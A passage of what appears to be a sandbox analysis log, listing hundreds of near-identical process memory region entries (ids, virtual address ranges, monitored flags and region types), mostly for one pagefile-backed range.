pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5844 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5845 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5846 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5847 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5848 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5849 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5850 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5851 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5852 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5853 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5854 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5855 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5856 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5857 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5858 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5861 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5862 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5863 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5864 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5865 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5866 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5867 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5868 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5869 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5870 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5871 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5872 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5873 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5874 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5878 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5879 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5880 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5881 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5882 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5883 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5884 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5885 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5886 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5887 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5888 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5889 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5890 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5891 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5892 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5894 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5895 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5896 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5897 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5898 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5899 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5900 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5901 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5902 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5903 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5904 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5905 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5906 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5907 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5908 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5909 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5910 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5911 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5915 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5916 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5917 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5918 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5919 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5920 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5921 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5922 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5923 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5924 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5925 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5926 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5927 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5928 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5929 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5930 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5931 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5932 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5933 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5934 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5935 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5936 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5937 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5938 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5939 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5940 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5941 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5942 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5943 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5944 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5945 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5946 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5947 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5948 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5949 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5950 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5951 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5952 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5953 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5954 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5955 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5956 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5957 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5958 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5959 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5960 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5961 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5962 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5963 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5964 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5965 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5966 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5967 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5968 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5969 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5970 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5971 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5972 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5973 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5974 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5975 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5976 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5977 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5978 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5979 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5980 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5981 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5982 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5983 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5984 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5985 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5986 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5987 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5988 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5989 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5990 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5991 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5992 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5993 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5994 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5995 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5996 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5997 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5998 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5999 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6000 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6001 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6002 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6003 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6004 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6005 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6006 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6007 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6008 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6009 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6010 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6011 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6012 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6013 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6014 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6015 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6016 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6017 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6018 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6019 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6020 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6021 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6022 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6023 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6024 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6025 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6026 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6027 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6028 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6029 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6030 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6031 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6033 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 6034 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6036 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6037 start_va = 0xbd70000 end_va = 0xc261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd70000" filename = "" Region: id = 6038 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6039 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6040 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6041 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6042 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = 